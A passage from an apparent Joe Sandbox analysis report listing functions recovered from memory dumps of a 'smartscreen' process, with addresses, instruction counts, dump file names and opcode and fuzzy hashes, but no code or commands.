                                                          • Instruction Fuzzy Hash: 22F06561A0F7C44FCB1A9A7488694547FA0EF6721174A52EFC445CF1A3EA1D9885C711
                                                          Function 00007FFD9B7912A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 7bd68e51fb2e6f9cfb95b9e5e53aea50fab733c3c41e411c04606f8199004131
                                                          • Instruction ID: b40802a4a57691287cffb446406ad976357db3b0b6b90848e9474288c9d378c8
                                                          • Opcode Fuzzy Hash: 7bd68e51fb2e6f9cfb95b9e5e53aea50fab733c3c41e411c04606f8199004131
                                                          • Instruction Fuzzy Hash: 90E09271A4F7C44FCB16EA348869454BFA0EF6720174A52EFC086CF5A3EA2DC889C701
                                                          Function 00007FFD9B786DF5 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V
                                                          • API String ID: 0-1342839628
                                                          • Opcode ID: 8ff6170bfc00ded071552b819af9ad04e304f33f11e510be431c6c09e4be9d2f
                                                          • Instruction ID: 460ba21d971b45360204ad46af60fac19f9ae869c52dbe30bb146aae283d1bcc
                                                          • Opcode Fuzzy Hash: 8ff6170bfc00ded071552b819af9ad04e304f33f11e510be431c6c09e4be9d2f
                                                          • Instruction Fuzzy Hash: 0FE0C210A2E7970FE326637418600E87B609F4660078A01F6D448CE0E3D84D098643D3
                                                          Function 00007FFD9B79AF19 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: ed299b62728f3847367148c1fb24ccc546231eec544961699d3004de9db2fef6
                                                          • Instruction ID: 8cd8ab4dadf664225cd20ee715cbc7d3f5c641927203da29c304c080838b3de1
                                                          • Opcode Fuzzy Hash: ed299b62728f3847367148c1fb24ccc546231eec544961699d3004de9db2fef6
                                                          • Instruction Fuzzy Hash: 19E01A6194F3C45FCB5AAB74887A8443FA0EE6B21078B41EEC089CF5B3E62D9949C701
                                                          Function 00007FFD9B7897E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: d4a9066e90e29e43fb23130c2b374d38154cdaae4fa6d731389d5539c282ff6a
                                                          • Instruction ID: c070582c185fe029ab4e027ed204f63b3dbf8541ba8d5b261cc9ee5c41427e78
                                                          • Opcode Fuzzy Hash: d4a9066e90e29e43fb23130c2b374d38154cdaae4fa6d731389d5539c282ff6a
                                                          • Instruction Fuzzy Hash: 88E09A7194F7C44FCB06EB7488A98047FA0AF2720078B00EEC085CF0B3E62D8848C701
                                                          Function 00007FFD9B789999 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 3d972ce09f3ed6c7852a33420eef1defb77debc4615dc417ebcfe6d2c6c695c8
                                                          • Instruction ID: 0cd8743d9b17d8eac5fda8a8b4ae23438b8d7c090cd5d09a2f178359511b3836
                                                          • Opcode Fuzzy Hash: 3d972ce09f3ed6c7852a33420eef1defb77debc4615dc417ebcfe6d2c6c695c8
                                                          • Instruction Fuzzy Hash: 79E0BF7154A3C44FCB16EB7488699957FB0EE6721178B41EEC149CF1B3E62D894AC701
                                                          Function 00007FFD9B7925B9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 272c6c2c47a8360e666b875b46ea72ae7de09cef4e002903099fd3742095893f
                                                          • Instruction ID: 1bb6b64e9681585670e723d8bf27ecff32eaf032831eba9f54921cc459e18318
                                                          • Opcode Fuzzy Hash: 272c6c2c47a8360e666b875b46ea72ae7de09cef4e002903099fd3742095893f
                                                          • Instruction Fuzzy Hash: ADE01A6154E3C48FCB06EB7488698553F70AE6721078B41DED049CF1B3E62D8A49CB01
                                                          Function 00007FFD9B771648 Relevance: .9, Instructions: 915COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6f74f0258649127d26eaa5c31e327b1eda42e34f1d6d907fb4a124580a58925
                                                          • Instruction ID: 0b23bc242a375c0cd2a0c8045667b1ea0cac3ac874a2f5fec58268b1800ad54e
                                                          • Opcode Fuzzy Hash: e6f74f0258649127d26eaa5c31e327b1eda42e34f1d6d907fb4a124580a58925
                                                          • Instruction Fuzzy Hash: 8552D771B19A4E4FEBA8EB5884A56B873D2FF58300F0506BAD01DC36E7DD24BD818781
                                                          Function 00007FFD9B79D380 Relevance: .9, Instructions: 854COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b8c873ec0d4bb8cdf569eca7b111d06ef1bc4cafc868eae3d22b58df577dc32
                                                          • Instruction ID: 187f0f01c116434b538f3693ddf4b2e8846788cccb28e3504a30f683510cdc26
                                                          • Opcode Fuzzy Hash: 7b8c873ec0d4bb8cdf569eca7b111d06ef1bc4cafc868eae3d22b58df577dc32
                                                          • Instruction Fuzzy Hash: D321C81BB0F2A64AEB2576BD68B14F93B50DF5123670843F3E19C8E0F3DD0C224A8661
                                                          Function 00007FFD9B770DD6 Relevance: .7, Instructions: 747COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2a19df6a02ae9ec2fc6603861f7ad7c8679519fbe6c6ad5ae864c81224e08ee
                                                          • Instruction ID: ad531eff7853898dba220237752f32cc392c7db07eee15251a654fac871b33b6
                                                          • Opcode Fuzzy Hash: c2a19df6a02ae9ec2fc6603861f7ad7c8679519fbe6c6ad5ae864c81224e08ee
                                                          • Instruction Fuzzy Hash: 9D42B671B19A4E8FEBA8EB5884A57B873D2FF58300F1506B9D00DC36A6DD34BD858781
                                                          Function 00007FFD9B771A4E Relevance: .4, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fce47e74771afa2f0b05a9cb19c8d2b95127d7d8b294c1e7ffbabaf900eaa7bb
                                                          • Instruction ID: 5df17786a0f0af1edc90e03febec77f5f6cae26e077483ea01f04583988c5733
                                                          • Opcode Fuzzy Hash: fce47e74771afa2f0b05a9cb19c8d2b95127d7d8b294c1e7ffbabaf900eaa7bb
                                                          • Instruction Fuzzy Hash: B5D1F771B19A4E8FEBA8EB5884A56B873D2FF58300F4506BAD04EC35F7DD24B9818741
                                                          Function 00007FFD9B7711CD Relevance: .4, Instructions: 403COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b05d5135b6edf7764add3f7fa3589e64f1440db90f9c3215236053637fb7febe
                                                          • Instruction ID: c18805cb2bb4ec08faab3a67388b92b2c131d35581f7bcab0c86d8b98424112f
                                                          • Opcode Fuzzy Hash: b05d5135b6edf7764add3f7fa3589e64f1440db90f9c3215236053637fb7febe
                                                          • Instruction Fuzzy Hash: 5BD1D621B1AA1D4FEBACEA6C84A577433E2EF54300F550676D44EC76F2EE64BE818341
                                                          Function 00007FFD9B7899D1 Relevance: .3, Instructions: 308COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 275f0874c2791c16ffcd5764380cd54a9024e130fb60e0660c3b7f30bf9385c3
                                                          • Instruction ID: d10d82013ae94402a10834c7e915ec82d265a0536134d11b6983b4414e0f9620
                                                          • Opcode Fuzzy Hash: 275f0874c2791c16ffcd5764380cd54a9024e130fb60e0660c3b7f30bf9385c3
                                                          • Instruction Fuzzy Hash: 8AA1B570B1890D4FDB58EB68C4A96B977E2FF98304B5106BAE01DC72E6DE35A842C741
                                                          Function 00007FFD9B793C75 Relevance: .3, Instructions: 293COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 198edc141a9e1f5da93ef302fad4a7cffec93c41f6e363a3f746a0b80b704ff4
                                                          • Instruction ID: 541935b413ac9023e0416ab681721662e700c4499d5ad67d57ebea28a5ddb433
                                                          • Opcode Fuzzy Hash: 198edc141a9e1f5da93ef302fad4a7cffec93c41f6e363a3f746a0b80b704ff4
                                                          • Instruction Fuzzy Hash: 71910761B1DA4E0FEB9CEB6844766B873D2EF94300F4542BAD40DC72E7DD286D458391
                                                          Function 00007FFD9B798CC5 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d53976ffad9d2149b1c176543a89a18b6653dad3ae34b0231837d7e11a6485e
                                                          • Instruction ID: 7b40edb5c5472133eb730426f233b6942f7cea50a193fb24de8555ca6b793cc5
                                                          • Opcode Fuzzy Hash: 3d53976ffad9d2149b1c176543a89a18b6653dad3ae34b0231837d7e11a6485e
                                                          • Instruction Fuzzy Hash: FB514770A19A5D8FEB98EF98C865BECB7E1FF54340F1042B6D01DD32A6DE3469848B41
                                                          Function 00007FFD9B760908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: 316e101ef78cfc286dd9bf9213776a60613c7b2364f351c9a1e9e6bd985e6ad7
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 6F21EA3130DD184FE768EA5CE889EB977D1EF9932171501BAE58EC7135E911EC8287C2
                                                          Function 00007FFD9B7929B0 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd52919b262416c93d76b696778e9b72b31a3d9f449e035985ae2fa39e946280
                                                          • Instruction ID: 3a1389d390925476d71c586f96ce20ae718ca004c5165f4f2051ebf1df7ee36a
                                                          • Opcode Fuzzy Hash: fd52919b262416c93d76b696778e9b72b31a3d9f449e035985ae2fa39e946280
                                                          • Instruction Fuzzy Hash: C631E42270EB8A0EE76DBBA858B56F83791EF45310F4902BBD45CC61F3CD2869848341
                                                          Function 00007FFD9B760998 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70f964767f6fd33a08a27fb134322336c094fef9e024dbb115cd9a9ae60caa89
                                                          • Instruction ID: 7685323061e6e44225c72ef89864a449c9734e3de1cf587c4676f1ed3b4eb7ff
                                                          • Opcode Fuzzy Hash: 70f964767f6fd33a08a27fb134322336c094fef9e024dbb115cd9a9ae60caa89
                                                          • Instruction Fuzzy Hash: D921C720B1DA5D4FEB58B66C946E6B977C2EB98311B4101BAE40EC32F7DD14AC418286
                                                          Function 00007FFD9B792AE2 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e915c9ea62c7d856f68276e589cdf469fd5ebe3e44053663e799d7e718605c33
                                                          • Instruction ID: 8b71936bb4455274132857aa3eda6cc05e5954c32d0a8476b94e30400fe688d5
                                                          • Opcode Fuzzy Hash: e915c9ea62c7d856f68276e589cdf469fd5ebe3e44053663e799d7e718605c33
                                                          • Instruction Fuzzy Hash: 1C318721B0DB8E4EEBADABE448A96B97BD1EF55340F4502BAD80DC21F3DD2869458341
                                                          Function 00007FFD9B79D2D0 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b75f5598a6e9d8461174682473958a1a48294fb26dc560763bd8c6753d5be0c
                                                          • Instruction ID: f6609f941454d63c8452fb29fbb631e40030d9770d37136bf41fd779f79a61d3
                                                          • Opcode Fuzzy Hash: 5b75f5598a6e9d8461174682473958a1a48294fb26dc560763bd8c6753d5be0c
                                                          • Instruction Fuzzy Hash: D921D732F08A1D8BEB64DA5CD8547E973A1EBC4310F020276D419E72A4DE386E418B80
                                                          Function 00007FFD9B760C25 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17cf985bdab4ffbd41694f3d756fe9e3f7777b576d343f5c88c02c361ad67cbe
                                                          • Instruction ID: 52b92d75296ca9d8214dee9b4bc088668ff5cf80eb1a385b0aa5117f87784938
                                                          • Opcode Fuzzy Hash: 17cf985bdab4ffbd41694f3d756fe9e3f7777b576d343f5c88c02c361ad67cbe
                                                          • Instruction Fuzzy Hash: 7A21A975A0D74D8FE7219B6484A52DC7FA0EF41310F1546B7D045DB1E6EA342A498742
                                                          Function 00007FFD9B7741B1 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 723a1528e4186a247d234d8ccc98d8c8edf5b250ccb0df6f29ab3f552b9d9f51
                                                          • Instruction ID: 4a4f0d3cae89287c860819f01597b0631c5bf55bb0f9536be15da5c8dc0fb986
                                                          • Opcode Fuzzy Hash: 723a1528e4186a247d234d8ccc98d8c8edf5b250ccb0df6f29ab3f552b9d9f51
                                                          • Instruction Fuzzy Hash: 1C218270E1965E8EEB649BA4C8656BE7BB1FF54300F01067EC016D72E6DF786A058B40
                                                          Function 00007FFD9B764C28 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70ec809df8753c88d0a71ad22cfb0f6d31bd0d67752d974cdb032d1a8d59c643
                                                          • Instruction ID: 1dbbf18fa1e366e9070df38494e331f83b6631a81480d706dda4767c6e320f90
                                                          • Opcode Fuzzy Hash: 70ec809df8753c88d0a71ad22cfb0f6d31bd0d67752d974cdb032d1a8d59c643
                                                          • Instruction Fuzzy Hash: 89215021F19A1D8FE7B4E75884B56B87392FF84310F1602BAE40DD76F6EE286E414642
                                                          Function 00007FFD9B792CA5 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4aa90c5ba8591997babfd32d592d3a0245f518036a23c0a41a8bc7ccfc6aa4f
                                                          • Instruction ID: f2e59eb6667d8d4d1d3ce950868c7ee0721d9f4cf597176daab12ccff037c488
                                                          • Opcode Fuzzy Hash: b4aa90c5ba8591997babfd32d592d3a0245f518036a23c0a41a8bc7ccfc6aa4f
                                                          • Instruction Fuzzy Hash: 6F21A135B09A1A8FEBA8FA88C4A47A833A1EB55310F450676D41DD72F6CA287D408B80
                                                          Function 00007FFD9B762BF9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ee821c576659ab6c2c1d7b24f0e57c1139b868ed885dc6b54d0b5cdc25cc3b6
                                                          • Instruction ID: 8475fecf40f6e15ae5616c086c60a12b98f6b52704f73b4b63d27a68654cda71
                                                          • Opcode Fuzzy Hash: 2ee821c576659ab6c2c1d7b24f0e57c1139b868ed885dc6b54d0b5cdc25cc3b6
                                                          • Instruction Fuzzy Hash: C6115730A08A0DCFDB58DB48C454BAD73E1FB68300F5142AAD04ED32B5DA34AA808B45
                                                          Function 00007FFD9B764D1E Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8513e25fc5f28fdd30f2a15e25cc643ecc23e485fa5e5661195462af4d449807
                                                          • Instruction ID: 749d73889029a48fe75c628fd4098ec0ec47e278af0bd8b7283bd2fe52820d55
                                                          • Opcode Fuzzy Hash: 8513e25fc5f28fdd30f2a15e25cc643ecc23e485fa5e5661195462af4d449807
                                                          • Instruction Fuzzy Hash: 19110321B0960DCFEBA8EA68C8A56B833D2EF94300F1611BDD04EC72F6DD386E518605
                                                          Function 00007FFD9B795444 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88139a2e6b1ab4db712aace99be4dc26ff193ef19be2f7a382558aae1395b395
                                                          • Instruction ID: fba03786e825d5266962976678e41be4d11e467d933b4bf95371a0d56aee7342
                                                          • Opcode Fuzzy Hash: 88139a2e6b1ab4db712aace99be4dc26ff193ef19be2f7a382558aae1395b395
                                                          • Instruction Fuzzy Hash: CF116371E0DA1D4EEFA8DE588492A6D73E1EB94340F654239D44EC3265CE34E9928784
                                                          Function 00007FFD9B760C38 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abbe8e5f76c3453e861cae0774ed8e81c7ce85a8fa4ef869bb2c64f9a2527d03
                                                          • Instruction ID: 4641cdd95d0891c1fdecdc8c315af84bf679a62eec6cb9f2f3aaf3c4fb113dc9
                                                          • Opcode Fuzzy Hash: abbe8e5f76c3453e861cae0774ed8e81c7ce85a8fa4ef869bb2c64f9a2527d03
                                                          • Instruction Fuzzy Hash: 09118235A0D78D8FE712DBA898A42DD7FB0EF82610F1646F7C085DB1E6E5341A498781
                                                          Function 00007FFD9B794B95 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 590a8cd2cc6a7ddf4bb5ce41ae5f999574a3ed192e0353e708a07f1434f66b29
                                                          • Instruction ID: f8790853e35bea9f5916696d0a03278101e55d6c58388f1f4aca2787ed058180
                                                          • Opcode Fuzzy Hash: 590a8cd2cc6a7ddf4bb5ce41ae5f999574a3ed192e0353e708a07f1434f66b29
                                                          • Instruction Fuzzy Hash: 26014470F18A1D4FDBA8DF5C8491A6973E1FBA8340F658679D44ED3265CE34ED828B80
                                                          Function 00007FFD9B797438 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72f291e8f7cf82786745e0dd4b90ade3e4eeea95f36091c2313c516d90a35844
                                                          • Instruction ID: eb0d9a97aaf74b4918bc928718228f06c8658720640caeb51d239b797c8f6e1a
                                                          • Opcode Fuzzy Hash: 72f291e8f7cf82786745e0dd4b90ade3e4eeea95f36091c2313c516d90a35844
                                                          • Instruction Fuzzy Hash: BFF0F42BB4D1910ED709B27C60A28F87F918F5223974881F7E09E8E4E7CD0994898684
                                                          Function 00007FFD9B78CA56 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 8ba51e5395a8b1b36b0f53c9b95a56551daa3b33e106712cb8376e5769b080ea
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: BD019675A1CF888FD7A4DF18844572AB7E2FBA8315F114A2EA09DD3660DB30A8018B42
                                                          Function 00007FFD9B760C40 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
